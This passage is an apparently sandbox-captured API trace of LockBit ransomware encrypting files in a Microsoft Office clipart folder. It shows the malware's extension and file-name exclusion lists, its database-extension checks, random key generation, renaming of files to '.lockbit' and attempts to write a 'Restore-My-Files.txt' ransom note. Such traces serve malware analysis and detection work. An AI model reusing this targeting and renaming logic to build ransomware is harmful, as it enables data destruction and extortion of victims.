Office\\CLIPART\\PUB60COR\\SL00345_.WMF") returned=".WMF" [0173.781] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.781] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.781] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.782] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.782] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00345_.WMF.lockbit") returned 72 [0173.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00345_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00345_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0173.783] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.783] malloc (_Size=0x40068) returned 0x3df0008 [0173.783] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2788) returned 1 [0173.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0173.784] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.784] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0173.784] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0173.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00345_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00345_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.786] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.786] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.788] free (_Block=0x1fa2ed8) [0173.788] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00345_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.788] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.788] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5aabee00, ftCreationTime.dwHighDateTime=0x1bd4af2, ftLastAccessTime.dwLowDateTime=0x5a980590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5aabee00, ftLastWriteTime.dwHighDateTime=0x1bd4af2, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00452_.WMF", cAlternateFileName="")) returned 1 [0173.788] lstrcmpiW (lpString1=".", lpString2="SL00452_.WMF") returned -1 [0173.788] lstrcmpiW (lpString1="..", lpString2="SL00452_.WMF") returned -1 [0173.788] PathFindExtensionW (pszPath="SL00452_.WMF") returned=".WMF" [0173.788] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.788] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.789] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.789] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00452_.WMF") returned -1 [0173.790] lstrcmpiW (lpString1="ntldr", lpString2="SL00452_.WMF") returned -1 [0173.790] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00452_.WMF") returned -1 [0173.790] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00452_.WMF") returned -1 [0173.790] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00452_.WMF") returned -1 [0173.790] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00452_.WMF") returned 1 [0173.790] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00452_.WMF") returned -1 [0173.790] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.790] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00452_.WMF") returned=".WMF" [0173.790] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.790] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.790] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.791] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.791] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00452_.WMF.lockbit") returned 72 [0173.791] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00452_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00452_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.792] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.792] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.792] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1344) returned 1 [0173.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.793] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00452_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00452_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.797] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.797] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.798] free (_Block=0x1fa2ed8) [0173.798] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00452_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.798] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.798] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.798] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ff15900, ftCreationTime.dwHighDateTime=0x1bd4af2, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4ff15900, ftLastWriteTime.dwHighDateTime=0x1bd4af2, nFileSizeHigh=0x0, nFileSizeLow=0x1db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL00712_.WMF", cAlternateFileName="")) returned 1 [0173.798] lstrcmpiW (lpString1=".", lpString2="SL00712_.WMF") returned -1 [0173.798] lstrcmpiW (lpString1="..", lpString2="SL00712_.WMF") returned -1 [0173.798] PathFindExtensionW (pszPath="SL00712_.WMF") returned=".WMF" [0173.798] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.798] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.798] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.798] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.799] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.799] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.800] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SL00712_.WMF") returned -1 [0173.800] lstrcmpiW (lpString1="ntldr", lpString2="SL00712_.WMF") returned -1 [0173.800] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SL00712_.WMF") returned -1 [0173.800] lstrcmpiW (lpString1="bootsect.bak", lpString2="SL00712_.WMF") returned -1 [0173.800] lstrcmpiW (lpString1="autorun.inf", lpString2="SL00712_.WMF") returned -1 [0173.800] lstrcmpiW (lpString1="thumbs.db", lpString2="SL00712_.WMF") returned 1 [0173.800] lstrcmpiW (lpString1="iconcache.db", lpString2="SL00712_.WMF") returned -1 [0173.800] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.800] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00712_.WMF") returned=".WMF" [0173.800] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.801] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.801] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.802] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00712_.WMF.lockbit") returned 72 [0173.802] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00712_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00712_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.802] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.803] malloc (_Size=0x40068) returned 0x3d70450 [0173.803] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7608) returned 1 [0173.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.804] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.804] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.822] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00712_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00712_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.822] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.822] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0173.823] free (_Block=0x1fa2ed8) [0173.823] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00712_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.823] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.823] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d63d00, ftCreationTime.dwHighDateTime=0x1bd4bfc, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17d63d00, ftLastWriteTime.dwHighDateTime=0x1bd4bfc, nFileSizeHigh=0x0, nFileSizeLow=0xcdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="SL01040_.WMF", cAlternateFileName="")) returned 1 [0173.823] lstrcmpiW (lpString1=".", lpString2="SL01040_.WMF") returned -1 [0173.823] lstrcmpiW (lpString1="..", lpString2="SL01040_.WMF") returned -1 [0173.823] PathFindExtensionW (pszPath="SL01040_.WMF") returned=".WMF" [0173.823] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.823] lstrcmpiW (lpString1=".ani", 